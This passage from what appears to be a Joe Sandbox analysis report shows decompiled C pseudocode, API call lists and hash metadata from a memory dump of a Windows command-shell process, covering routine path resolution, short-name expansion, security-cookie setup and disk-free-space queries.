                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                    • NtQueryInformationProcess.NTDLL(000000FF,00000027,?,00000004,00000000), ref: 011D5991
                                    • NtSetInformationProcess.NTDLL(000000FF,00000027,?,00000004), ref: 011D59AF
                                    • NtSetInformationProcess.NTDLL(000000FF,00000027,?,00000004), ref: 011D5A17
                                    • longjmp.MSVCRT(0120B8B8,00000001,00000000), ref: 011E981B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Process$Information$Heap$AllocCurrentDirectoryQuery_setjmp3longjmp
                                    • String ID: %9d
                                    • API String ID: 4212706909-2241623522
                                    • Opcode ID: b89fdad383df9a4a44298f93d2af6ecc927726763f3139db8341f21db931234f
                                    • Instruction ID: 076ada4763b7f5cd79016c0bda98e2724dde123a8b3f8abc480590b9f25c1222
                                    • Opcode Fuzzy Hash: b89fdad383df9a4a44298f93d2af6ecc927726763f3139db8341f21db931234f
                                    • Instruction Fuzzy Hash: B741C5B0D00315EFDB28DFA9A849A6ABFF4FB54728F10422EE624D7294DB704540CF91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 85%
                                    			E011D5226(intOrPtr __ecx, signed int __edx) {
                                    				intOrPtr _v8;
                                    				signed int _v16;
                                    				long _v28;
                                    				char _v32;
                                    				LPWSTR* _v36;
                                    				void _v556;
                                    				signed int _v560;
                                    				signed short** _v564;
                                    				WCHAR* _v568;
                                    				LPWSTR* _v572;
                                    				intOrPtr _v576;
                                    				LPWSTR* _v580;
                                    				signed int _v584;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t146;
                                    				signed short** _t160;
                                    				intOrPtr _t164;
                                    				LPWSTR* _t165;
                                    				intOrPtr _t167;
                                    				intOrPtr _t169;
                                    				signed int _t176;
                                    				void* _t179;
                                    				signed short** _t183;
                                    				intOrPtr _t186;
                                    				intOrPtr _t187;
                                    				intOrPtr _t188;
                                    				intOrPtr _t190;
                                    				signed int _t194;
                                    				void* _t195;
                                    				signed short _t197;
                                    				intOrPtr _t199;
                                    				void* _t205;
                                    				void* _t207;
                                    				void* _t209;
                                    				signed short _t211;
                                    				void* _t213;
                                    				WCHAR* _t222;
                                    				signed short* _t225;
                                    				intOrPtr* _t226;
                                    				void* _t228;
                                    				intOrPtr _t230;
                                    				signed short* _t235;
                                    				signed int _t236;
                                    				intOrPtr* _t244;
                                    				short* _t247;
                                    				void* _t248;
                                    				intOrPtr* _t249;
                                    				intOrPtr* _t256;
                                    				intOrPtr* _t259;
                                    				void* _t262;
                                    				intOrPtr* _t263;
                                    				signed short* _t266;
                                    				signed short* _t267;
                                    				intOrPtr* _t269;
                                    				signed int _t273;
                                    				signed int _t276;
                                    				signed short* _t280;
                                    				void* _t288;
                                    				signed short* _t289;
                                    				void* _t292;
                                    				short* _t293;
                                    				void* _t297;
                                    				short _t298;
                                    				intOrPtr* _t299;
                                    				intOrPtr* _t303;
                                    				signed int _t306;
                                    				signed short* _t307;
                                    				void* _t314;
                                    				intOrPtr* _t316;
                                    				intOrPtr* _t322;
                                    				LPWSTR* _t324;
                                    				void* _t325;
                                    				void* _t326;
                                    				WCHAR* _t327;
                                    				void* _t328;
                                    				void* _t331;
                                    				intOrPtr _t333;
                                    				void* _t334;
                                    				intOrPtr _t336;
                                    				intOrPtr* _t340;
                                    				intOrPtr* _t341;
                                    				short* _t344;
                                    				void* _t346;
                                    				intOrPtr* _t347;
                                    				signed int _t349;
                                    				intOrPtr _t353;
                                    				intOrPtr _t357;
                                    				signed int _t363;
                                    
                                    				_t295 = __edx;
                                    				_t236 = _t363;
                                    				_push(__ecx);
                                    				_push(__ecx);
                                    				_v8 =  *((intOrPtr*)(_t236 + 4));
                                    				_t361 = (_t363 & 0xfffffff8) + 4;
                                    				_t146 =  *0x11fd0b4; // 0x2833377e
                                    				_v16 = _t146 ^ (_t363 & 0xfffffff8) + 0x00000004;
                                    				_t322 =  *((intOrPtr*)(_t236 + 8));
                                    				_t333 = __ecx;
                                    				_v28 = 0x104;
                                    				_v584 = __edx;
                                    				_v576 = __ecx;
                                    				_v568 = _t322;
                                    				_v572 = 0;
                                    				_v580 = 0;
                                    				_v36 = 0;
                                    				_v32 = 1;
                                    				memset( &_v556, 0, 0x104);
                                    				if(E011E0C70( &_v556, ((0 | _v32 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
                                    					_t324 = 1;
                                    					L25:
                                    					__imp__??_V@YAXPAX@Z(_v36);
                                    					_pop(_t325);
                                    					_pop(_t334);
                                    					return E011E6FD0(_t324, _t236, _v16 ^ _t361, _t295, _t325, _t334);
                                    				}
                                    				_t160 =  *(_v584 + 0x20);
                                    				_v564 = _t160;
                                    				if(_t160 == 0) {
                                    					_t161 =  *0x1213cb8;
                                    					if( *0x1213cb8 == 0) {
                                    						_t161 = 0x1213ab0;
                                    					}
                                    					E011E1040(_t322,  *(_t236 + 0xc), _t161);
                                    					_t244 = _t322;
                                    					_v572 = 0;
                                    					_t326 = 2;
                                    					_t297 = _t244 + 2;
                                    					do {
                                    						_t164 =  *_t244;
                                    						_t244 = _t244 + _t326;
                                    					} while (_t164 != 0);
                                    					_t165 = _v568;
                                    					_t336 = _v576;
                                    					_t298 = 0x5c;
                                    					_t247 = _t165 + (_t244 - _t297 >> 1) * 2;
                                    					if(_t165 >= _t247) {
                                    						L38:
                                    						 *_t247 = _t298;
                                    						 *((short*)(_t247 + 2)) = 0;
                                    						L39:
                                    						if(( *(_t336 + 0x1c) & 0x00000200) == 0) {
                                    							L54:
                                    							_t299 = _v568;
                                    							_t248 = _t299 + 2;
                                    							do {
                                    								_t167 =  *_t299;
                                    								_t299 = _t299 + _t326;
                                    							} while (_t167 != 0);
                                    							_v572 = _t299 - _t248 >> 1;
                                    							_t340 =  *((intOrPtr*)(_v576 + 0x18)) + 0x2c;
                                    							_t295 = 0;
                                    							_t249 = _t340;
                                    							_v560 = _t249 + 2;
                                    							do {
                                    								_t169 =  *_t249;
                                    								_t249 = _t249 + _t326;
                                    							} while (_t169 != 0);
                                    							_t327 = _v568;
                                    							if( &(_v572[0]) + (_t249 - _v560 >> 1) > 0x7fe7) {
                                    								L53:
                                    								_t341 = _v564;
                                    								L89:
                                    								_v580 = 1;
                                    								L20:
                                    								if( *((intOrPtr*)(_t236 + 0x10)) == 0) {
                                    									L24:
                                    									_t324 = _v580;
                                    									goto L25;
                                    								}
                                    								if(_t341 == 0 || ( *(_t341 + 0x1c) & 0x00002000) == 0) {
                                    									if(( *(_v584 + 0x1c) & 0x00002000) != 0) {
                                    										goto L90;
                                    									}
                                    								} else {
                                    									L90:
                                    									_t328 = CreateFileW(_t327, 0x80000000, 1, 0, 3, 0x80, 0);
                                    									if(_t328 != 0xffffffff) {
                                    										_t176 = GetFileType(_t328);
                                    										CloseHandle(_t328);
                                    										if((_t176 & 0xffff7fff) == 1) {
                                    											_t344 = _v568;
                                    											_t295 = 0x400023d3;
                                    											_t179 = E011F9583(_t344, 0x400023d3, 0x400023d4);
                                    											if(_t179 == 0) {
                                    												 *_t344 = 0;
                                    											} else {
                                    												if(_t179 == 0) {
                                    													_t183 = _v564;
                                    													if(_t183 == 0) {
                                    														_t183 = _v584;
                                    													}
                                    													 *(_t183 + 0x1c) =  *(_t183 + 0x1c) & 0xffffdfff;
                                    												}
                                    											}
                                    										}
                                    									}
                                    								}
                                    								goto L24;
                                    							}
                                    							_push(_t340);
                                    							L80:
                                    							_t295 =  *(_t236 + 0xc);
                                    							E011E18C0(_t327,  *(_t236 + 0xc));
                                    							_t341 = _v564;
                                    							goto L20;
                                    						}
                                    						_t303 =  *((intOrPtr*)(_t336 + 0x18)) + 0x234;
                                    						_t256 = _t303;
                                    						_v572 = _t303;
                                    						_v560 = _t256 + 2;
                                    						do {
                                    							_t186 =  *_t256;
                                    							_t256 = _t256 + _t326;
                                    						} while (_t186 != 0);
                                    						if(_t256 == _v560) {
                                    							goto L54;
                                    						}
                                    						_t259 = _t303;
                                    						_t295 = 0;
                                    						_t346 = _t259 + 2;
                                    						do {
                                    							_t187 =  *_t259;
                                    							_t259 = _t259 + _t326;
                                    						} while (_t187 != 0);
                                    						if(_t259 == _t346) {
                                    							L52:
                                    							_t327 = _v568;
                                    							goto L53;
                                    						}
                                    						_t347 = _v568;
                                    						_t262 = _t347 + 2;
                                    						do {
                                    							_t188 =  *_t347;
                                    							_t347 = _t347 + _t326;
                                    						} while (_t188 != 0);
                                    						_t263 = _v572;
                                    						_t349 = _t347 - _t262 >> 1;
                                    						_t72 = _t263 + 2; // 0x2
                                    						_v560 = _t72;
                                    						do {
                                    							_t190 =  *_t263;
                                    							_t263 = _t263 + _t326;
                                    						} while (_t190 != 0);
                                    						_t295 = _v572;
                                    						if(_t349 + 1 + (_t263 - _v560 >> 1) > 0x7fe7) {
                                    							goto L52;
                                    						}
                                    						_t327 = _v568;
                                    						_push(_t295);
                                    						goto L80;
                                    					} else {
                                    						goto L33;
                                    					}
                                    					do {
                                    						L33:
                                    						if( *_t165 == _t298) {
                                    							_v572 = _t165;
                                    						}
                                    						_t165 = _t165 + _t326;
                                    					} while (_t165 < _t247);
                                    					if(_v572 == 0 || _v572 < _t247 - 2) {
                                    						goto L38;
                                    					} else {
                                    						goto L39;
                                    					}
                                    				}
                                    				_t266 =  *_t160;
                                    				_t331 = 2;
                                    				_t194 =  *_t266 & 0x0000ffff;
                                    				_t306 = _t194;
                                    				_v560 = _t306;
                                    				if(_t194 == 0) {
                                    					L6:
                                    					_t195 = 0x3a;
                                    					if(_t306 == _t195) {
                                    						if(( *(_t333 + 0x1c) & 0x00000200) == 0) {
                                    							L73:
                                    							_t307 =  *_v564;
                                    							_t267 =  &(_t307[1]);
                                    							do {
                                    								_t197 =  *_t307;
                                    								_t307 = _t307 + _t331;
                                    							} while (_t197 != 0);
                                    							_t295 = _t307 - _t267 >> 1;
                                    							_t269 =  *((intOrPtr*)(_v576 + 0x18)) + 0x2c;
                                    							_v560 = _t269 + 2;
                                    							do {
                                    								_t199 =  *_t269;
                                    								_t269 = _t269 + _t331;
                                    							} while (_t199 != 0);
                                    							_t353 = _v576;
                                    							_t327 = _v568;
                                    							if(_t295 + 1 + (_t269 - _v560 >> 1) > 0x7fe7) {
                                    								goto L53;
                                    							}
                                    							E011E1040(_t327,  *(_t236 + 0xc),  *_v564);
                                    							_t205 =  *((intOrPtr*)(_t353 + 0x18)) + 0x2c;
                                    							L79:
                                    							_push(_t205);
                                    							goto L80;
                                    						}
                                    						_t295 =  *((intOrPtr*)(_t333 + 0x18)) + 0x234;
                                    						_t273 = _t295;
                                    						_v560 = _t273 + 2;
                                    						do {
                                    							_t207 =  *_t273;
                                    							_t273 = _t273 + _t331;
                                    						} while (_t207 != 0);
                                    						if(_t273 == _v560) {
                                    							goto L73;
                                    						}
                                    						_t276 = _t295;
                                    						_v560 = _t276 + 2;
                                    						do {
                                    							_t209 =  *_t276;
                                    							_t276 = _t276 + _t331;
                                    						} while (_t209 != 0);
                                    						if(_t276 == _v560) {
                                    							goto L52;
                                    						}
                                    						_t280 =  *_v564;
                                    						_v560 =  &(_t280[1]);
                                    						do {
                                    							_t211 =  *_t280;
                                    							_t280 = _t280 + _t331;
                                    						} while (_t211 != 0);
                                    						_t357 = _v576;
                                    						_v572 = _t280 - _v560 >> 1;
                                    						_v560 = _t295 + 2;
                                    						do {
                                    							_t213 =  *_t295;
                                    							_t295 = _t295 + _t331;
                                    						} while (_t213 != 0);
                                    						if( &(_v572[0]) + _t295 > 0x7fe7) {
                                    							goto L52;
                                    						}
                                    						_t327 = _v568;
                                    						E011E1040(_t327,  *(_t236 + 0xc),  *_v564);
                                    						_t205 =  *((intOrPtr*)(_t357 + 0x18)) + 0x234;
                                    						goto L79;
                                    					}
                                    					if( *((intOrPtr*)(_t236 + 0x10)) == 0) {
                                    						L17:
                                    						_t341 = _v564;
                                    						_t327 = _v568;
                                    						_t295 =  *(_t236 + 0xc);
                                    						if(E011D5400(_t327,  *(_t236 + 0xc),  *_t341,  *((intOrPtr*)(_t333 + 4))) != 0) {
                                    							E011F985A(_t220);
                                    							_v580 = 1;
                                    						}
                                    						_t222 = _v36;
                                    						if(_t222 == 0) {
                                    							_t222 =  &_v556;
                                    						}
                                    						if(GetFullPathNameW(_t327, _v28, _t222, 0) > 0x7fe7) {
                                    							_t288 = 0x6f;
                                    							E011F985A(_t288);
                                    							goto L89;
                                    						} else {
                                    							goto L20;
                                    						}
                                    					}
                                    					_t313 = _v564;
                                    					_t225 =  *_v564;
                                    					_t289 = _t225;
                                    					if(_v560 == 0) {
                                    						L12:
                                    						if( *_t289 != 0x2a) {
                                    							goto L17;
                                    						}
                                    						_t226 = E011D5846( *_t313);
                                    						_t314 = 0x5c;
                                    						if( *_t226 != _t314) {
                                    							goto L17;
                                    						}
                                    						_t292 = E011E2349( *((intOrPtr*)(_t333 + 4)), _t314);
                                    						if(_t292 == 0) {
                                    							_t293 =  *((intOrPtr*)(_t333 + 4));
                                    							_t228 = 0x3a;
                                    							if( *((intOrPtr*)(_t293 + 2)) == _t228) {
                                    								_t293 = _t293 + 4;
                                    							}
                                    						} else {
                                    							_t293 = _t292 + _t331;
                                    						}
                                    						if(( *(_t333 + 0x1c) & 0x00000200) != 0) {
                                    							_t316 =  *((intOrPtr*)(_t333 + 0x18)) + 0x234;
                                    							_v560 = _t316 + 2;
                                    							do {
                                    								_t230 =  *_t316;
                                    								_t316 = _t316 + _t331;
                                    							} while (_t230 != _v572);
                                    							if(_t316 != _v560) {
                                    								 *_t293 = 0;
                                    								E011E18C0( *((intOrPtr*)(_t333 + 4)),  *((intOrPtr*)(_t333 + 8)),  *((intOrPtr*)(_t333 + 0x18)) + 0x234);
                                    							}
                                    						}
                                    						goto L17;
                                    					} else {
                                    						goto L10;
                                    						L10:
                                    						_t289 = _t225;
                                    						_t225 = _t225 + _t331;
                                    						if( *_t225 != 0) {
                                    							goto L10;
                                    						} else {
                                    							_t333 = _v576;
                                    							goto L12;
                                    						}
                                    					}
                                    				} else {
                                    					goto L4;
                                    					L4:
                                    					_t235 = _t266;
                                    					_t266 = _t266 + _t331;
                                    					if( *_t266 != 0) {
                                    						goto L4;
                                    					} else {
                                    						_t306 =  *_t235 & 0x0000ffff;
                                    						goto L6;
                                    					}
                                    				}
                                    			}

                                    APIs
                                    • memset.MSVCRT ref: 011D528C
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000000,?,?,-00000105,?,00000000,?), ref: 011D5394
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011D53D5
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: memset$FullNamePath
                                    • String ID:
                                    • API String ID: 3158150540-0
                                    • Opcode ID: 7c3cb870a0a0bf4b48a417cfc42239b6faf1400a7c6be65ed5152e79111d7c78
                                    • Instruction ID: 1d65ef8af689fd46dd4e42ec56fa2d9855fdb2b9851c476d235c6caa985d31c1
                                    • Opcode Fuzzy Hash: 7c3cb870a0a0bf4b48a417cfc42239b6faf1400a7c6be65ed5152e79111d7c78
                                    • Instruction Fuzzy Hash: A102B535A005199BDF2DDFA8CC986A9B7F2FF88318F1941E9D80997245D774AE82CF40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 58%
                                    			E011E245C(WCHAR* __ecx, signed int __edx, intOrPtr _a4) {
                                    				signed int _v8;
                                    				struct _WIN32_FIND_DATAW _v604;
                                    				signed int _v608;
                                    				void _v612;
                                    				signed int _v616;
                                    				void* _v620;
                                    				intOrPtr _v624;
                                    				WCHAR* _v628;
                                    				void* _v632;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t42;
                                    				intOrPtr _t44;
                                    				void* _t45;
                                    				void _t47;
                                    				void* _t53;
                                    				void _t54;
                                    				void _t58;
                                    				char* _t69;
                                    				char* _t71;
                                    				intOrPtr* _t73;
                                    				signed int _t75;
                                    				void* _t76;
                                    				WCHAR* _t77;
                                    				void* _t80;
                                    				void* _t81;
                                    				signed int _t83;
                                    				void* _t84;
                                    				void* _t91;
                                    				void* _t96;
                                    				void* _t97;
                                    				short* _t99;
                                    				void* _t100;
                                    				void* _t101;
                                    				void* _t102;
                                    				void* _t103;
                                    				int _t104;
                                    				void* _t105;
                                    				signed int _t106;
                                    				signed int _t108;
                                    
                                    				_t90 = __edx;
                                    				_t77 = __ecx;
                                    				_t108 = (_t106 & 0xfffffff8) - 0x274;
                                    				_t42 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t42 ^ _t108;
                                    				_t73 = __ecx;
                                    				_v616 = __edx;
                                    				_v628 = __ecx;
                                    				_v624 = 0;
                                    				_t99 =  &(__ecx[1]);
                                    				do {
                                    					_t44 =  *_t73;
                                    					_t73 = _t73 + 2;
                                    				} while (_t44 != 0);
                                    				_t75 = _t73 - _t99 >> 1;
                                    				if(_t75 > __edx) {
                                    					L21:
                                    					_t45 = 0;
                                    				} else {
                                    					_t97 =  &(__ecx[3]);
                                    					_t101 = _t97;
                                    					_v632 = _t101;
                                    					do {
                                    						_t47 =  *_t97 & 0x0000ffff;
                                    						_v612 = _t47;
                                    						if(_t47 == 0 || _t47 == 0x5c) {
                                    							 *_t97 = 0;
                                    							_t80 = FindFirstFileW(_t77,  &_v604);
                                    							_t47 = _v612;
                                    							 *_t97 = _t47;
                                    							if(_t80 == 0xffffffff) {
                                    								_t97 = _t97 + 2;
                                    								_t101 = _t97;
                                    								goto L17;
                                    							} else {
                                    								FindClose(_t80);
                                    								if(_v604.cAlternateFileName != 0) {
                                    									if(_a4 != 0) {
                                    										L23:
                                    										_t53 =  &(_v604.cAlternateFileName);
                                    										goto L12;
                                    									} else {
                                    										_t69 =  &(_v604.cAlternateFileName);
                                    										__imp___wcsnicmp(_t69, _t101, _t97 - _t101 >> 1);
                                    										_t108 = _t108 + 0xc;
                                    										if(_t69 != 0) {
                                    											goto L11;
                                    										} else {
                                    											_t71 =  &(_v604.cFileName);
                                    											__imp___wcsicmp(_t71,  &(_v604.cAlternateFileName));
                                    											if(_t71 == 0) {
                                    												goto L11;
                                    											} else {
                                    												goto L23;
                                    											}
                                    										}
                                    									}
                                    									L14:
                                    									_t83 = _t81 - _t91 >> 1;
                                    									_t90 = _t83 - (_t97 - _t101 >> 1);
                                    									_v608 = _t83;
                                    									_t75 = _t75 + _t90;
                                    									if(_t75 >= _v616) {
                                    										goto L21;
                                    									} else {
                                    										if(_t90 > 0) {
                                    											_t84 = _t97;
                                    											_t102 = _t84 + 2;
                                    											do {
                                    												_t58 =  *_t84;
                                    												_t84 = _t84 + 2;
                                    											} while (_t58 != _v624);
                                    											_t103 = _t97 + _t90 * 2;
                                    											memmove(_t103, _t97, 1 + (_t84 - _t102 >> 1) * 2);
                                    											_t83 = _v608;
                                    											_t108 = _t108 + 0xc;
                                    											_t97 = _t103;
                                    										}
                                    										_t104 = _t83 + _t83;
                                    										memcpy(_v632, _v620, _t104);
                                    										_v632 = _v632 + _t104;
                                    										_t108 = _t108 + 0xc;
                                    										_t105 = _v632;
                                    										_t90 = _v616 - (_t105 - _v628 >> 1);
                                    										E011E1040(_t105, _v616 - (_t105 - _v628 >> 1), _t97);
                                    										_t47 = _v616;
                                    										_t101 = _t105 + 2;
                                    										_t97 = _t101;
                                    										L17:
                                    										_t77 = _v628;
                                    										_v632 = _t101;
                                    										goto L6;
                                    									}
                                    									goto L8;
                                    								} else {
                                    									L11:
                                    									_t53 =  &(_v604.cFileName);
                                    								}
                                    								L12:
                                    								_t81 = _t53;
                                    								_v620 = _t53;
                                    								_t91 = _t81 + 2;
                                    								do {
                                    									_t54 =  *_t81;
                                    									_t81 = _t81 + 2;
                                    								} while (_t54 != _v624);
                                    								goto L14;
                                    							}
                                    						} else {
                                    							goto L6;
                                    						}
                                    						goto L8;
                                    						L6:
                                    						_t97 = _t97 + 2;
                                    					} while (_t47 != 0);
                                    					_t45 = 1;
                                    				}
                                    				L8:
                                    				_pop(_t96);
                                    				_pop(_t100);
                                    				_pop(_t76);
                                    				return E011E6FD0(_t45, _t76, _v8 ^ _t108, _t90, _t96, _t100);
                                    			}

                                    APIs
                                    • FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000000,00000000), ref: 011E24EC
                                    • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011E2505
                                    • memcpy.MSVCRT ref: 011E2566
                                    • _wcsnicmp.MSVCRT ref: 011E25BC
                                    • _wcsicmp.MSVCRT ref: 011ED61E
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Find$CloseFileFirst_wcsicmp_wcsnicmpmemcpy
                                    • String ID:
                                    • API String ID: 242869866-0
                                    • Opcode ID: de6a4b7375402375424036d3f698e5740b55eed9b4f24dc0db29432e51250165
                                    • Instruction ID: fd707ee37c3a39e8e56c084c0ecf49c5ba5a461ac25c78ef01de136c490cb250
                                    • Opcode Fuzzy Hash: de6a4b7375402375424036d3f698e5740b55eed9b4f24dc0db29432e51250165
                                    • Instruction Fuzzy Hash: 7551E5755047018BCB28CFA8DC685ABB7E9EFC8714F15492DF99AC3244EB30D945CB92
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E011E7513() {
                                    				void* _v8;
                                    				struct _FILETIME _v16;
                                    				signed int _v20;
                                    				union _LARGE_INTEGER _v24;
                                    				signed int _t23;
                                    				signed int _t36;
                                    				signed int _t37;
                                    				signed int _t39;
                                    
                                    				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                    				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                    				_t23 =  *0x11fd0b4; // 0x2833377e
                                    				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                    					GetSystemTimeAsFileTime( &_v16);
                                    					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                    					_v8 = _v8 ^ GetCurrentProcessId();
                                    					_v8 = _v8 ^ GetCurrentThreadId();
                                    					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                    					QueryPerformanceCounter( &_v24);
                                    					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                    					_t39 = _t36;
                                    					if(_t36 == 0xbb40e64e || ( *0x11fd0b4 & 0xffff0000) == 0) {
                                    						_t36 = 0xbb40e64f;
                                    						_t39 = 0xbb40e64f;
                                    					}
                                    					 *0x11fd0b4 = _t39;
                                    				}
                                    				_t37 =  !_t36;
                                    				 *0x11fd0b8 = _t37;
                                    				return _t37;
                                    			}

                                    APIs
                                    • GetSystemTimeAsFileTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000), ref: 011E7540
                                    • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 011E754F
                                    • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 011E7558
                                    • GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 011E7561
                                    • QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?), ref: 011E7576
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                    • String ID:
                                    • API String ID: 1445889803-0
                                    • Opcode ID: ac9f1ae1da07457771ca0440c27a2869b638c5cfcaaa2793f40fc510ae5e922c
                                    • Instruction ID: 91f36294d6aba23adbd744778a569813f9453fb769e7d45e21dc8ef99227def7
                                    • Opcode Fuzzy Hash: ac9f1ae1da07457771ca0440c27a2869b638c5cfcaaa2793f40fc510ae5e922c
                                    • Instruction Fuzzy Hash: ED113A71D05208EBDF24DFF8E65C6AEBBF5EF58314F55486AD411E7248EB309A408B41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 86%
                                    			E011FA0D2(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                    				signed int _v8;
                                    				int _v20;
                                    				char _v24;
                                    				int _v28;
                                    				void _v548;
                                    				intOrPtr _v552;
                                    				intOrPtr _v560;
                                    				union _ULARGE_INTEGER _v564;
                                    				union _ULARGE_INTEGER _v572;
                                    				union _ULARGE_INTEGER _v580;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t35;
                                    				WCHAR* _t51;
                                    				char _t60;
                                    				WCHAR* _t69;
                                    				void* _t77;
                                    				void* _t78;
                                    				void* _t79;
                                    				signed int _t81;
                                    
                                    				_t76 = __edx;
                                    				_t35 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t35 ^ _t81;
                                    				_t79 = __edx;
                                    				_v552 = _a8;
                                    				_t78 = __ecx;
                                    				E011DB6B9(__ecx);
                                    				_v28 = 0;
                                    				_v20 = 0x104;
                                    				_t60 = 1;
                                    				_v24 = 1;
                                    				memset( &_v548, 0, 0x104);
                                    				if(E011E0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) >= 0) {
                                    					E011E0D89(_t76, _t79);
                                    					_t51 = _v28;
                                    					_t69 = _t51;
                                    					if(_t51 == 0) {
                                    						_t69 =  &_v548;
                                    					}
                                    					if( *_t69 != 0 && _t69[1] == 0x3a && _t69[2] == 0) {
                                    						E011E0CF2(_t76, "\\");
                                    						_t51 = _v28;
                                    					}
                                    					_v560 = 0;
                                    					_v564.LowPart = 0;
                                    					if(_t51 == 0) {
                                    						_t51 =  &_v548;
                                    					}
                                    					GetDiskFreeSpaceExW(_t51,  &_v564,  &_v580,  &_v572);
                                    					_t77 = 6;
                                    					E011F7A11(_t78, _t77);
                                    					_t54 = _v28;
                                    					if(_v28 == 0) {
                                    						_t54 =  &_v548;
                                    					}
                                    					_t76 =  &_v564;
                                    					E011FAC75(_a4,  &_v564, 0xe, _t54, _v20);
                                    					_t79 = _v28;
                                    					if(_t79 == 0) {
                                    						_t79 =  &_v548;
                                    					}
                                    					E011E274C(0x1213d00, 0x104, L"%5lu", _v552);
                                    					_push(_t79);
                                    					_t60 = E011F7C83(0x1213d00, _t76, _t78, 0x2379, 2, 0x1213d00);
                                    				}
                                    				__imp__??_V@YAXPAX@Z();
                                    				return E011E6FD0(_t60, _t60, _v8 ^ _t81, _t76, _t78, _t79, _v28);
                                    			}

                                    APIs
                                    • memset.MSVCRT ref: 011FA118
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • GetDiskFreeSpaceExW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,-00000105,?,?,?), ref: 011FA1B5
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011FA225
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: memset$DiskFreeSpace
                                    • String ID: %5lu
                                    • API String ID: 2448137811-2100233843
                                    • Opcode ID: ebb02f2ffb30847b32b531025e7b0ba2a3c78bd1bdf5fa6874c0b213cc1816fe
